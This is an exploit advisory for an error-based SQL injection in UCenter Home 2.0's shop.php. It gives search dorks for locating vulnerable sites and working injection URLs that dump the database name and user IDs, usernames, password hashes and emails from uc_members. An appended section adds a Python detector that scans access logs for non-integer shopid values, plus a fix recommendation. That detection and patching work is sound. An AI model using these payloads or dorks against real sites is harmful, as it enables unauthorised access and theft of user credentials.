__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..

DB : Okay.
You edit the DB `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okay.
Use hex conversion, and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
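
Detection note (an added example, not part of the original advisory): both requests above turn shopid into something other than a plain integer, so a site operator can look for that in web-server access logs. The sketch assumes legitimate shopid values are decimal integers like the 253 used above; the log lines are constructed samples, and the function name and marker list are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic); IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2011:10:01:02 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120
203.0.113.9 - - [12/Mar/2011:10:01:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812
203.0.113.7 - - [12/Mar/2011:10:02:11 +0000] "GET /shop.php?ac=list HTTP/1.1" 200 4096
203.0.113.9 - - [12/Mar/2011:10:02:30 +0000] "GET /Shop.php?ac=view&shopid=253+and+1%3D1 HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Substrings typical of the error-based pattern in this advisory (illustrative list).
MARKERS = ("information_schema", "floor(rand(", "group by", "concat(", "select")


def suspicious_shopid_requests(log_text):
    """Return (client_ip, decoded_shopid, markers) for every shop.php request
    whose shopid is not a plain decimal integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        # The advisory writes both "Shop.php" and "shop.php", so compare case-insensitively.
        if not url.path.lower().endswith("/shop.php"):
            continue
        # parse_qs percent-decodes values, so encoded payloads are inspected in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
            if re.fullmatch(r"[0-9]+", value):
                continue
            normalized = re.sub(r"\s+", " ", value.lower())
            findings.append((client, value, [k for k in MARKERS if k in normalized]))
    return findings


if __name__ == "__main__":
    for client, value, markers in suspicious_shopid_requests(SAMPLE_LOG):
        print(client, repr(value[:60]), markers)
```

A hit with an empty marker list (such as the `253 and 1=1` probe in the sample) still merits review, since any non-integer shopid reaching the query is the root cause; the lasting fix is to cast or bind shopid as an integer in shop.php.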